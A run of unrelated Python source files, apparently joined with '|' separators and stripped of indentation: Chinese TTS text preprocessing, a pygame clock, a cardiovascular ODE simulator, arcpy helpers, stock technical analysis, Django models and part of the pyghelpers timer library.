if not isinstance(number, (int,)) or number < 0:
return ''
elif number >= pow(10, 7):
return self._independence_number2chinese(str(number))
if number == 0:
return '零'
digit_to_hanzi = {
'0': '零',
'1': '一',
'2': '二',
'3': '三',
'4': '四',
'5': '五',
'6': '六',
'7': '七',
'8': '八',
'9': '九',
}
# for every 4 position
sections = {
4: '万',
8: '亿',
}
# the number2chinese for 1~999, for example, 350 -> 3百, 5十
per_section = {
1: '十',
2: '百',
3: '千',
}
# number_string = unicode(number)
number_string = str(number)
def convert_four_number(num):
# num is already inverse order
res = ''
for i, val in enumerate(num):
tmp = digit_to_hanzi.get(val)
if val != '0':
tmp += per_section.get(i % 4, '')
res = tmp + res
return res
result = []
four_number_round = ''
total_count = len(number_string)
for i, val in enumerate(reversed(number_string)):
if i in sections:
result.insert(0, sections[i])
# for every 4 position
four_number_round += val
if len(four_number_round) < 4 and i + 1 < total_count:
continue
insert_val = convert_four_number(four_number_round)
# put last 4 position directly
if i < 4:
insert_val = insert_val.rstrip('零')
# all zeros, replace '万', '亿' with '零'
elif all([i == '零' for i in insert_val]):
result[0] = '零'
# non-all-zeros
# Then: multiple zeros at the end are merged into one zero and swap the position with '万'/'亿'
elif insert_val.endswith('零'):
insert_val = insert_val.rstrip('零')
pos_zero = result.pop(0)
insert_val = insert_val + pos_zero + '零'
result.insert(0, insert_val)
four_number_round = ''
result = ''.join(result)
# 10: 一十 -> 十
# 10,0000: 一十万 -> 十万
if result.startswith('一十'):
result = result.lstrip('一')
# del redundant '零'
result = result.strip('零')
# 1001: 一千零零一 -> 一千零一
result = re.sub(r'零+', '零', result)
return result
def _float_number2chinese(self, number: str):
number = number.strip('\r\n ')
int_number = number.split('.')[0]
float_number = ''.join(number.split('.')[1:])
result = '{}点{}'.format(self._integer_number2chinese(int_number),
self._independence_number2chinese(float_number))
return result
def number2chinese_utils(self, number):
# number: re object
try:
number = str(number.group('value'))
except:
print('number error in number2chinese_utils, get object: {}'.format(number))
if '年' == number[-1]: # '1997年'
result = '{}年'.format(self._independence_number2chinese(number[:-1]))
elif '$' == number[0]: # '$12.5'
result = '{}美元'.format(self._float_number2chinese(number[1:]))
elif '¥' == number[0]: # '¥12.5'
result = '{}元'.format(self._float_number2chinese(number[1:]))
elif '%' == number[-1]: # '12.5%'
result = '百分之{}'.format(self._float_number2chinese(number[:-1]))
elif '/' in number: # '10/13'
son = number.split('/')[0]
father = ''.join(number.split('/')[1:])
result = '{}分之{}'.format(self._integer_number2chinese(father), self._integer_number2chinese(son))
elif '.' in number: # '12.5'
result = self._float_number2chinese(number)
else:
result = self._integer_number2chinese(number)
return result
def number2chinese(self, input_path, output_path):
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
for regex, replacement in self._number_expression:
line = re.sub(regex, replacement, line)
line = '{}\n'.format(line)
fout.write(line.encode('utf-8'))
def prosody_prediction(self, input_path, output_path):
# word boudary will be '#1'
# ',' etc punctuation will be '#3'
# the end of sentences will be '#4'
wordcut_type = None
try:
from pyhanlp import HanLP
wordcut_type = 'hanlp'
except ImportError:
print('cannot import HanLP')
if wordcut_type is None:
try:
import jieba
wordcut_type = 'jieba'
except ImportError:
print('cannot import jieba')
assert wordcut_type is not None, 'no package to word cut'
with open(input_path, 'rb') as fin, open(output_path, 'wb') as fout:
for line in fin:
line = line.decode('utf-8').strip('\r\n ')
if wordcut_type == 'hanlp':
line = HanLP.segment(line)
line = [str(x).split('/')[0] for x in line]
line = self._word_boundary.join(line)
elif wordcut_type == 'jieba':
# add new word here
jieba.suggest_freq('您的', tune=True)
jieba.suggest_freq('您呢', tune=True)
line = self._word_boundary.join(jieba.cut(line, HMM=True))
for regex, replacement in self._replacement_expression:
line = re.sub(regex, replacement, line)
try:
if line[-1] not in self._keep_symbols:
line = '{} {} {}\n'.format(line[:-4], self._prosody_mark[3],
'。') # default end of utterence is '。'
else:
# input line: '我行 # 邀请 # 你 # 办理 # 业务 # 。'
# output line: '我行 # 邀请 # 你 # 办理 # 业务 % 。'
line = '{} {} {}\n'.format(line[:-4], self._prosody_mark[3], line[-1])
except:
print('error in wordcut, line:', line)
fout.write(line.encode('utf-8'))
def transform_pinyin(self, input_path, output_path):
# transform chinese to pinyin
# text format should be ''
# which means prosody mark should by gapped by self._pinyin_boundary
assert os.path.isfile(self._pinyin_dict_path), 'pinyin dict not found'
self._w2p = words2pinyin(path_pinyin=self._pinyin_dict_path, path_text=input_path)
res = self._w2p.transform()
res = ['{}\n'.format(' '.join(x)).encode('utf-8') for x in res]
with open(output_path, 'wb') as fout:
fout.writelines(res)
def text2pinyin(self, input_path, output_path):
# directly transform pure text file to pinyin file
# include: number to chinese, clean symbols, prosody prediction, transform pinyin
self._tmp_dir = 'tmp_data'
os.makedirs(self._tmp_dir, exist_ok=True)
tmp_output_path1 = os.path.join(self._tmp_dir, 'tmp_data1')
tmp_output_path2 = os.path.join(self._tmp_dir, 'tmp_data2')
tmp_output_path3 = os.path.join(self._tmp_dir, 'tmp_data3')
# first number to chinese then clean symbols, because 12.5, 12.5%, 12元/股 etc.
self.number2chinese(input_path, tmp_output_path1)
self.clean_symbols(tmp_output_path1, tmp_output_path2)
self.prosody_prediction(tmp_output_path2, tmp_output_path3)
self.transform_pinyin(tmp_output_path3, output_path)
if __name__ == '__main__':
test_input_path = 'data/biaobei.puretext'
test_output_path = 'data/biaobei.pinyin'
taco_pre = TacotronPreprocess()
taco_pre.text2pinyin(test_input_path, test_output_path)
|
import sys, pygame
import core,timer,AlarmClock
background_colour = (255,255,255)
(width, height) = (300, 200)
screen = pygame.display.set_mode((width, height))
pygame.display.set_caption('clock app')
screen.fill(background_colour)
pygame.display.flip()
running = True
Gui = AlarmClock.AlarmClock()
def main():
while True:
Gui.onupdate()
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
pygame.display.update()
for temp in core.allButton:
temp.Render(screen)
for alarmClock in AlarmClock.allAlarm:
alarmClock.CheckAlarm()
pygame.quit()
if __name__ == "__main__":
main()
|
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
import torch
def init_random_state():
max_ves = 64.0 - 10.0
min_ves = 36.0 + 10.0
max_ved = 167.0 - 10.0
min_ved = 121.0 + 10.0
max_sv = 1.0
min_sv = 0.9
max_pa = 85.0
min_pa = 75.0
max_pv = 7.0
min_pv = 3.0
max_s = 0.25
min_s = 0.15
init_ves = (np.random.rand() * (max_ves - min_ves) + min_ves) / 100.0
# init_ves = 50.0 / 100.0
init_ved = (np.random.rand() * (max_ved - min_ved) + min_ved) / 100.0
# init_ved = 144.0 / 100.0
init_sv = (np.random.rand() * (max_sv - min_sv) + min_sv)
init_pa = (np.random.rand() * (max_pa - min_pa) + min_pa) / 100.0
init_pv = (np.random.rand() * (max_pv - min_pv) + min_pv) / 10.0
init_s = (np.random.rand() * (max_s - min_s) + min_s)
init_state = np.array([init_pa, init_pv, init_s, init_sv])
return init_state
def dx_dt(state, t, params):
# Parameters:
f_hr_max = params["f_hr_max"]
f_hr_min = params["f_hr_min"]
r_tpr_max = params["r_tpr_max"]
r_tpr_min = params["r_tpr_min"]
ca = params["ca"]
cv = params["cv"]
k_width = params["k_width"]
p_aset = params["p_aset"]
tau = params["tau"]
# Unknown parameters:
i_ext = params["i_ext"]
r_tpr_mod = params["r_tpr_mod"]
sv_mod = params["sv_mod"]
# State variables
p_a = 100. * state[0]
p_v = 10. * state[1]
s = state[2]
sv = 100. * state[3]
# Building f_hr and r_tpr:
f_hr = s * (f_hr_max - f_hr_min) + f_hr_min
r_tpr = s * (r_tpr_max - r_tpr_min) + r_tpr_min - r_tpr_mod
# Building dp_a/dt and dp_v/dt:
dva_dt = -1. * (p_a - p_v) / r_tpr + sv * f_hr
dvv_dt = -1. * dva_dt + i_ext
dpa_dt = dva_dt / (ca * 100.)
dpv_dt = dvv_dt / (cv * 10.)
# Building dS/dt:
ds_dt = (1. / tau) * (1. - 1. / (1 + np.exp(-1 * k_width * (p_a - p_aset))) - s)
dsv_dt = i_ext * sv_mod
# State derivative
return np.array([dpa_dt, dpv_dt, ds_dt, dsv_dt])
def states_trajectory_to_sample(states, params):
p_a = states[:, 0]
p_v = states[:, 1]
s = states[:, 2]
f_hr_max = params["f_hr_max"]
f_hr_min = params["f_hr_min"]
f_hr = s * (f_hr_max - f_hr_min) + f_hr_min
return np.stack((p_a, p_v, f_hr), axis=1)
def create_example(sample):
length = sample.shape[0]
fig, axs = plt.subplots(3)
axs[0].plot(range(length), sample[:length, 0], 'r', label='Pa')
axs[0].set(ylabel='Pa [mmHg]')
axs[0].set(ylim=(0.0, 1.5))
axs[1].plot(range(length), sample[:length, 1], 'b', label='Pv')
axs[1].set(ylabel='Pv [mmHg]')
axs[1].set(ylim=(0.0, 1.0))
axs[2].plot(range(length), sample[:length, 2] * 60, 'k', label='f_hr')
axs[2].set(ylabel='f_hr [bpm]')
axs[2].set(ylim=(40, 200))
for ax in axs:
ax.set(xlabel='time')
ax.grid()
plt.savefig('CVS_example.png')
def get_random_params():
i_ext = 0.0 if np.random.rand() > 0.5 else -2.0
r_tpr_mod = 0.0 if np.random.rand() > 0.5 else 0.5
return {"i_ext": i_ext,
"r_tpr_mod": r_tpr_mod,
"f_hr_max": 3.0,
"f_hr_min": 2.0 / 3.0,
"r_tpr_max": 2.134,
"r_tpr_min": 0.5335,
"sv_mod": 0.0001,
"ca": 4.0,
"cv": 111.0,
# dS/dt parameters
"k_width": 0.1838,
"p_aset": 70,
"tau": 20,
"p_0lv": 2.03,
"r_valve": 0.0025,
"k_elv": 0.066,
"v_ed0": 7.14,
"T_sys": 4. / 15.,
"cprsw_max": 103.8,
"cprsw_min": 25.9
}
def create_cvs_data(args):
added_time = 50 if args.model == 'cvs' else 0
t = np.arange(0.0, stop=(args.seq_len + added_time) * args.delta_t, step=args.delta_t)
sample_size = 3
state_size = 4
raw_data = np.zeros(tuple([args.data_size, args.seq_len, sample_size]))
latent_data = np.zeros((args.data_size, args.seq_len, state_size))
params_data = []
for i in range(args.data_size):
# initial state
init_state = init_random_state()
params = get_random_params()
params_data.append(params)
states_trajectory = integrate.odeint(dx_dt, init_state, t, args=tuple([params]))[added_time:]
raw_data[i] = states_trajectory_to_sample(states_trajectory, params)
latent_data[i] = states_trajectory
return raw_data, latent_data, params_data
|
# coding=utf-8
"""This module contains functions that simplify data management activities."""
# Python 2/3 compatibility
# pylint: disable=wildcard-import,unused-wildcard-import,wrong-import-order,wrong-import-position
from __future__ import (absolute_import, division, print_function, unicode_literals)
from future.builtins.disabled import *
from future.builtins import *
from future.standard_library import install_aliases
install_aliases()
# pylint: enable=wildcard-import,unused-wildcard-import,wrong-import-order,wrong-import-position
import arcpy
def create_rows(edit_session, in_table, rows, field_names = "*"):
_create_rows(edit_session, in_table, rows, field_names)
def delete_rows(edit_session, in_table, where_clause = None, field_names = "*"):
_delete_rows(edit_session, in_table, where_clause, field_names)
def read_rows(in_table, where_clause = None, field_names = "*"):
with arcpy.da.SearchCursor(in_table, field_names, where_clause) as cursor:
rows = [row for row in cursor]
return rows
def update_rows_func(edit_session, in_table, update_func, where_clause = None, field_names = "*"):
_update_rows_func(edit_session, in_table, update_func, where_clause, field_names)
###############################################################################
# PRIVATE FUNCTIONS
###############################################################################
def _edit_handler(func):
def wrapper(*args):
edit_session = args[0]
edit_session.startOperation()
try:
func(*args)
except Exception:
edit_session.abortOperation()
raise
edit_session.stopOperation()
return wrapper
@_edit_handler
def _create_rows(edit_session, in_table, rows, field_names):
with arcpy.da.InsertCursor(in_table, field_names) as cursor:
for row in rows:
cursor.insertRow(row)
@_edit_handler
def _delete_rows(edit_session, in_table, where_clause, field_names):
with arcpy.da.UpdateCursor(in_table, field_names, where_clause) as cursor:
for row in cursor:
cursor.deleteRow()
@_edit_handler
def _update_rows_func(edit_session, in_table, update_func, where_clause, field_names):
with arcpy.da.UpdateCursor(in_table, field_names, where_clause) as cursor:
for row in cursor:
cursor.updateRow(update_func(row))
|
import json
import csv
import numpy as np
from stockstats import StockDataFrame
import pandas as pd
import mplfinance as mpf
import seaborn as sn
import matplotlib.pyplot as plt
def load_secrets():
"""
Load data from secret.json as JSON
:return: Dict.
"""
try:
with open('secret.json', 'r') as fp:
data = json.load(fp)
return data
except Exception as e:
raise e
def to_csv(filename, input_list: list):
"""
:param input_list: List of dict
:param filename: filename.csv
:return:
"""
rows = []
keys, values = [], []
for data in input_list:
keys, values = [], []
for key, value in data.items():
keys.append(key)
values.append(value)
rows.append(values)
with open(filename, "w") as outfile:
csvwriter = csv.writer(outfile)
csvwriter.writerow(keys)
for row in rows:
csvwriter.writerow(row)
class TechnicalAnalysisV2:
"""
Class to perform technical analysis on input stock data.
The input data should have columns date, open, high, low, close, volume etc.
"""
def __init__(self, data=None, name: str = None):
self.data = pd.DataFrame(data)
self.name = name
@staticmethod
def __get_trend(data, stride=1):
"""
Get trend from a given data.
:param data: Price data
:param stride: Neighbour distance to consider for determining trend
:return: Trend list
"""
if stride < 1:
stride = 1
trend = []
stride_list = [i for i in range(stride)]
stride_list.extend([(i - (len(data) - 1)) * -1 for i in range(stride)])
for index, value in enumerate(data):
if index in stride_list:
trend.append('-')
continue
prev_value = data[index - stride]
next_value = data[index + stride]
if prev_value <= value < next_value or prev_value < value <= next_value:
trend.append('A')
elif prev_value >= value > next_value or prev_value > value >= next_value:
trend.append('D')
elif prev_value < value > next_value:
trend.append('SH')
elif prev_value > value < next_value:
trend.append('SL')
else:
trend.append('-')
return trend
def get_swing_data(self, stride, type='close', data=None, ramp=False, swing=True):
"""
Get actions and swing data for given data
:param data: Price data
:param stride: Neighbour distance to consider for determining trend
:param type: Open, high, low or close.
:param ramp: Consider ascend and descend separately
:param swing: If True, considers swing high and low and movement as separate, else Swing low and ascending in
one and swing high and descending in another
:return: Dict {actions, swing high, swing low}
"""
if data:
data = pd.DataFrame(data)[type]
else:
data = self.data[type]
trends = []
for s in range(0, stride, 1):
trend = self.__get_trend(data=data, stride=s)
trends.append(trend)
length = len(trends[0])
strong_values = []
for index in range(length):
value = [t[index] for t in trends]
equal = all(ele == value[0] for ele in value)
if equal:
strong_values.append(value[0])
else:
strong_values.append('.')
"""
Indices for Swing high and Swing low values.
"""
swing_high_indices = [hi for hi, value in enumerate(strong_values) if value == 'SH']
swing_low_indices = [li for li, value in enumerate(strong_values) if value == 'SL']
ascend_indices = [li for li, value in enumerate(strong_values) if value == 'A']
descend_indices = [li for li, value in enumerate(strong_values) if value == 'D']
"""
Assign actions corresponding to price.
"""
actions = []
if swing:
for value in strong_values:
if value == 'SH':
actions.append('Sell')
elif value == 'SL':
actions.append('Buy')
else:
if ramp:
if value == 'A':
actions.append('Hold-Up')
else:
actions.append('Hold-Down')
else:
actions.append('Hold')
if not swing:
for value in strong_values:
if value == 'SH' or value == 'D':
actions.append('Sell')
elif value == 'SL' or value == 'A':
actions.append('Buy')
else:
actions.append('Buy')
return {
'actions': actions,
'swing_high_indices': swing_high_indices,
'swing_low_indices': swing_low_indices,
'ascend_indices': ascend_indices,
'descend_indices': descend_indices
}
def get_indicators(self, *args, data=None, to_percentage=True):
"""
Get set of indicators on input data
:param data: Input data (any of open, high, low, close)
:param args: indicator strings ==> https://pypi.org/project/stockstats/
:param to_percentage: divide by 100
:return: Dictionary of technical indicators on input file.
"""
if data:
data = pd.DataFrame(data)
else:
data = self.data
stock = StockDataFrame.retype(data)
indicators = {}
for arg in args:
try:
if 'vwap' == arg:
vwap = self.get_vwap(data)
indicators['vwap'] = vwap
continue
if to_percentage:
indicators[arg] = stock[arg] / 100
continue
indicators[arg] = stock[arg]
except Exception as e:
pass
return indicators
def get_vwap(self, data=None, autoscale=True):
"""
Find VWAP for given data
:param data:
:param autoscale: scale vwap with price to get a smaller value
:return:
"""
close = data['close']
volume = data['volume']
vwap = (np.cumsum(volume * close) / np.cumsum(volume))
if autoscale:
vwap = vwap / max(vwap)
return vwap
def get_vwap_gradient(self, data=None, delta=100):
"""
Get slope of vwap
:param data:
:param delta:
:return:
"""
if data:
data = pd.DataFrame(data)
else:
data = self.data
vwap = list(self.get_vwap(data, autoscale=True))
r = []
for i in range(1, delta):
rotated = self.__rotate(vwap, -i)
v = [(i - j) for (i, j) in zip(vwap, rotated)]
r.append(v)
mean = np.mean(r, 0)
return mean
def get_candle_ratios(self, data=None, to_percentage=True):
"""
Get ratios of candle and wicks
:param data:
:param to_percentage: divide by 100
:return:
"""
if data:
data = pd.DataFrame(data)
else:
data = self.data
high = data['high']
low = data['low']
open_ = data['open']
close = data['close']
candle = abs(open_ - close)
candle_type = close > open_
total_candle = high - low
upper_wick = [abs(high[index] - close[index]) if i else abs(high[index] - open_[index]) for
index, i in enumerate(candle_type)]
lower_wick = [abs(low[index] - open_[index]) if i else abs(low[index] - close[index]) for
index, i in enumerate(candle_type)]
type_ = [1 if i else 0 for i in list(close > open_)]
# ratios
if to_percentage:
r1 = [(i / (j + 0.1)) / 100 for i, j in zip(candle, total_candle)]
r2 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, total_candle)]
r3 = [(i / (j + 0.1)) / 100 for i, j in zip(lower_wick, total_candle)]
r4 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, lower_wick)]
r5 = [(i / (j + 0.1)) / 100 for i, j in zip(upper_wick, candle)]
r6 = [(i / (j + 0.1)) / 100 for i, j in zip(lower_wick, candle)]
else:
r1 = [(i / (j + 0.1)) for i, j in zip(candle, total_candle)]
r2 = [(i / (j + 0.1)) for i, j in zip(upper_wick, total_candle)]
r3 = [(i / (j + 0.1)) for i, j in zip(lower_wick, total_candle)]
r4 = [(i / (j + 0.1)) for i, j in zip(upper_wick, lower_wick)]
r5 = [(i / (j + 0.1)) for i, j in zip(upper_wick, candle)]
r6 = [(i / (j + 0.1)) for i, j in zip(lower_wick, candle)]
return {
'r1': r1,
'r2': r2,
'r3': r3,
'r4': r4,
'r5': r5,
'r6': r6,
't': type_
}
def generate_data_set(self, type='close', ramp=False, swing=True,
include_candle_ratios=True):
"""
Generate dataset from given data and save as csv file.
:param type: Column to consider. open, high, low or close.
:param ramp:Boolean. Consider ascend and descend separately
:param swing:Boolean. If True, considers swing high and low and movement as separate, else Swing low and ascending in
one and swing high and descending in another
:param normalize: Boolean. Normalize data or not.
:param coeff: Coefficient for normalization.
:param include_candle_ratios: Boolean. Include the different ratios of a candle wicks and body.
:return:
"""
swing = self.get_swing_data(stride=1, type=type, ramp=ramp, swing=swing)
indicators = self.get_indicators('rsi_6', 'rsi_10', 'pdi', 'mdi', 'adx', 'kdjk', 'kdjd',
'kdjj', 'wr_6', 'wr_10', 'vwap')
if include_candle_ratios:
ratios = self.get_candle_ratios()
indicators.update(ratios)
indicators['actions'] = swing['actions']
data_set = pd.DataFrame(data=indicators).iloc[5:]
data_set.to_csv(self.name + '.csv', index=False)
@staticmethod
def __rotate(input_list, n):
return input_list[n:] + input_list[:n]
def get_best_moving_average(self, max_length=200, min_length=10):
"""
Get the best moving average that act as support/resistance.
:param max_length:
:param min_length:
:return: best moving average
"""
data = self.data
data_open = data.get('open')
data_close = data.get('close')
data_high = data.get('high')
data_low = data.get('low')
assert len(data_close) > max_length
assert min_length <= max_length
errors = []
# True: Green, False:Red
# Looking for consecutive red or green candles to confirm trend
candle_type = [data_close[i] >= data_open[i] for i in range(len(data_close))]
next_candle_1 = self.__rotate(candle_type, -1)
next_candle_2 = self.__rotate(candle_type, 1)
trend = np.logical_and(np.logical_and(candle_type, next_candle_1), next_candle_2)
for length in range(min_length, max_length + 1, 1):
sma = 'close_' + str(length) + '_sma'
average_close = list(self.get_indicators(sma)[sma])[length - 1:]
high = list(data_high)[length - 1:]
low = list(data_low)[length - 1:]
direction = trend[length - 1:]
anchor = [low[index] if value else high[index] for index, value in enumerate(direction)]
error = [abs(anchor[index] - value) for index, value
in enumerate(average_close)]
errors.append(int(np.median(error) * 10000))
return errors.index(np.median(errors)) + 1
def plot_chart(self, type='candle', moving_averages: tuple = None, show_volume=True, length=100):
"""
Plot candlestick
:param show_volume: plot volume or not
:param type: candle, line, renko, ohlc, bars
:param moving_averages: tuple. Moving averages tobe plotted
:param length: length of data tobe displayed
:return:
"""
max_length = len(self.data)
assert max_length > length
data = self.data[max_length - length:]
if moving_averages:
mpf.plot(data, type=type, mav=moving_averages, volume=show_volume)
else:
mpf.plot(data, type=type, volume=show_volume)
def analyse_dataset(self):
"""
Plot correlation matrix from dataset
:return:
"""
filename = self.name + '.csv'
try:
dataset = pd.read_csv(filename)
correlation = dataset.corr()
sn.heatmap(correlation, annot=True)
plt.show()
dataset.plot(kind='hist')
plt.show()
dataset.plot(kind='density')
plt.show()
print('Max value: ', dataset.max(), ' Min value: ', dataset.min())
except Exception as e:
print(e)
|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.forms import ModelForm
class Team(models.Model):
team_name = models.CharField(max_length=100, unique=True)
idea_title = models.CharField(max_length=100)
idea_description = models.CharField(max_length=1000)
def __unicode__(self):
return self.team_name
class Participant(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
college = models.CharField(max_length=100)
contact = models.CharField(max_length=13)
team = models.ForeignKey(Team, on_delete=models.CASCADE)
is_approved = models.BooleanField()
is_paid = models.BooleanField()
def __unicode__(self):
return self.user.username
class TeamForm(ModelForm):
class Meta:
model = Team
fields = ['team_name', 'idea_title', 'idea_description']
|
"""
pyghelpers is a collection of classes and functions written in Python for use with Pygame.
pyghelpers is pronounced "pig helpers".
Developed by Irv Kalb - Irv at furrypants.com
Full documentation at: https://pyghelpers.readthedocs.io/en/latest/
pyghelpers contains the following classes:
- Timer - a simple timer
- CountUpTimer - a timer that counts up from zero
- CountDownTimer - a timer that counts down from a starting point
- SceneMgr - allows for a Pygame program with multiple scenes
- Scene - base class for a scene managed by the SceneMgr
pyghelpers also contains the following functions:
- textYesNoDialog - a text-based dialog box allowing for one or two answers (yes/no, or just OK)
- customYesNoDialog - a dialog box with custom graphics (yes/no, or just OK)
- textAnswerDialog - a text-based dialog box allowing the user to enter a string
- customAnswerDialog - a dialog box with custom graphics that allows the user to enter a string
Many helpers allow the use of a callback (a function or method to be called when an action happens)
Any widget that uses a callback should be set up like this:
def <callbackMethodName>(self, nickName):
When the appropriate action happens, the callback method will be called and the nickName will be passed.
If you don't need the nickname, you can just ignore that parameter
"""
"""
************************************************************************************************
Simplified BSD License:
Copyright 2017 Irv Kalb. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY Irv Kalb ''AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Irv Kalb OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the
authors and should not be interpreted as representing official policies, either expressed
or implied, of Irv Kalb.
******************************************************************************************
History:
11/21 Version 1.0.3
Cleaned up some documentation of parameters
Removed all FileIO functions
Added __all__ to define what gets imported when you import *
Change the SceneMgr so you pass in list of Scenes objects instead of a dictionary.
Each scene must implement getSceenKey to define the scene key.
First scene in the list is the starting scene.
Use ABC for abstract base class and abstract methods
Updated code using f strings in Timer's getTimeHHMMSS, and clean up of timers
Turn off key repeating when going to a new scene
Changed SceneMgr _goToScene method to goToScene
5/26/20 Version 1.0.2
Added __version__ and function getVersion()
Version 1.0 01/13/20
"""
__all__ = [
'CountDownTimer',
'CountUpTimer',
'DIALOG_BACKGROUND_COLOR',
'DIALOG_BLACK',
'Scene',
'SceneMgr',
'Timer',
'customAnswerDialog',
'customYesNoDialog',
'textAnswerDialog',
'textYesNoDialog',
]
import pygame
from pygame.locals import *
import pygwidgets
import sys
import time
from abc import ABC, abstractmethod
__version__ = "1.0.3"
def getVersion():
"""Returns the current version number of the pyghelpers package"""
return __version__
# Timer classes:
# Timer (simple)
# CountUpTimer
# CountDownTimer
# Timer
class Timer():
"""
This class is used to create a very simple Timer.
Typical use:
1) Create a Timer object:
myTimer = pyghelpers.Timer(10)
2) When you want the timer to start running, make this call:
myTimer.start()
You can also call this method to restart the timer after it finishes.
3) In your big loop, check to see if the timer has finished:
finished = myTimer.update()
Normally returns False, but returns True when the timer is finished
Parameters:
| timeInSeconds - the duration of the timer, in seconds (integer or float)
Optional keyword parameters:
| nickname - an internal name to associate with this timer (defaults to None)
| callback - a function or object.method to be called back when the timer is finished
| The nickname of the timer will be passed in when the callback is made (defaults to None)
"""
def __init__(self, timeInSeconds, nickname=None, callBack=None):
self.timeInSeconds = timeInSeconds
self.nickname = nickname
self.callBack = callBack
self.savedSecondsElapsed = 0.0
self.running = False
def start(self, newTimeInSeconds=None):
"""Start the timer running (starts at zero).
Allows you to optionally specify a different amount of time.
"""
if newTimeInSeconds is not None:
self.timeInSeconds = newTimeInSeconds
self.running = True
self.startTime = time.time()
def update(self):
"""Call this in every frame to update the timer
Returns:
| False - most of the time
| True - when the timer is finished
| (you can use this indication, or set up a callback)
"""
if not self.running:
return False
self.savedSecondsElapsed = time.time() - self.startTime
if self.savedSecondsElapsed < self.timeInSeconds:
return False # running but hasn't reached limit
else: # timer has finished
self.running = False
if self.callBack is not None:
self.callBack(self.nickname)
return True # True here means that the timer has ended
def getTime(self):
""" Call this if you want to know how much has elapsed
Returns:
| 0 - if the Timer is not running
| seconds elapsed since start, as a float
"""
if self.running:
self.savedSecondsElapsed = time.time() - self.startTime
return self.savedSecondsElapsed
def stop(self):
"""Stops the timer"""
self.getTime() # remembers final self.savedSecondsElapsed
self.running = False
# CountUpTimer class
class CountUpTimer():
"""
This class is used to create a Timer that counts up (starting at zero).
Its intended use is where you want to continuously display the time in a window (using a DisplayText object).
Typical use:
1) Create a CountUpTimer object:
myTimer = pyghelpers.CountUpTimer()
2) When you want the timer to start running, make this call:
myTimer.start()
This method can also be called to restart the timer.
3) Whenever you want to get the current time (in seconds since start), you can call any of:
theTime = pyghelpers.getTime() # gets time as a float
theTime = pyghelpers.getTimeInSeconds() # gets the time as an integer number of seconds
theTime = pyghelpers.getTimeInHHMMSS() # gets the time in HH:MM:SS string format
One of the above should be called every time through your main loop.
4) If you want to stop the timer, call:
myTimer.stop()
Parameters:
| none
"""
def __init__(self):
self.running = False
self.savedSecondsElapsed = 0.0
self.secondsStart = 0 # safeguard
def start(self):
"""Start the timer running (starts at zero). Can be called to restart the timer, for example to play a game multiple times"""
self.secondsStart = time.time() # get the current seconds and save the value
self.running = True
self.savedSecondsElapsed = 0.0
def getTime(self):
"""Returns the time elapsed as a float"""
if not self.running:
return self.savedSecondsElapsed # do nothing
self.savedSecondsElapsed = time.time() - self.secondsStart
return self.savedSecondsElapsed # returns a float
def getTimeInSeconds(self):
"""Returns the time elapsed as an integer number of seconds"""
nSeconds = int(self.getTime())
return nSeconds
# Updated version using fStrings
def getTimeInHHMMSS(self, nMillisecondsDigits=0):
"""Returns the elapsed time as a HH:MM:SS.mmm formatted string
Parameters:
Optional keyword parameters:
| nMillisecondsDigits - number of milliseconds digits to include (defaults to 0)
| If specified, returned string will look like: HH:MM:SS.mmm
"""
nSeconds = self.getTime()
mins, secs = divmod(nSeconds, 60)
hours, mins = divmod(int(mins), 60)
if nMillisecondsDigits > 0:
secondsWidth = nMillisecondsDigits + 3
else:
secondsWidth = 2
if hours > 0:
output = f'{hours:d}:{mins:02d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
elif mins > 0:
output = f'{mins:d}:{secs:0{secondsWidth}.{nMillisecondsDigits}f}'
else:
output = f'{secs:.{nMillisecondsDigits}f}'
return output
def stop(self):
"""Stops the timer"""
self.getTime() # remembers final self.savedSecondsElapsed
self.running = False
# To do: Would be nice to add both pause and continue methods
#
# CountDownTimer class
#
class CountDownTimer():
"""
This class is used to create a Timer that counts down from a given starting number of seconds.
Its intended use is where you want to continuously display the time in a window (using a DisplayText object).
Typical use:
1) Create a CountDownTimer object:
myTimer = pyghelpers.CountDownTimer(60) # start the timer at 60 seconds
2) When you want the timer to start running, make this call:
myTimer.start()
This method can also be used to restart the timer.
3) Whenever you want to get the remaining time (in seconds since start), you can call any of:
theTime = pyghelpers.getTime() # gets time as a float
theTime = pyghelpers.getTimeInSeconds() # gets the time as an integer number of seconds
theTime = pyghelpers.getTimeInHHMMSS() # gets the time in HH:MM:SS string format
4) If you want to stop the timer, call:
myTimer.stop()
Parameters:
| nStartingSeconds - the starting point for the timer, in seconds (integer or float)
Optional keyword parameters:
| stopAtZero - should the timer stop when it reaches zero (defaults to True)
| nickname - an internal name used to refer to this timer (defaults to None)
| callback - a function or object.method to be called back when the timer is finished
| The nickname of the timer will be passed in when the callback is made (defaults to None)
"""
def __init__(self, nStartingSeconds, stopAtZero=True, nickname=None, callBack=None):
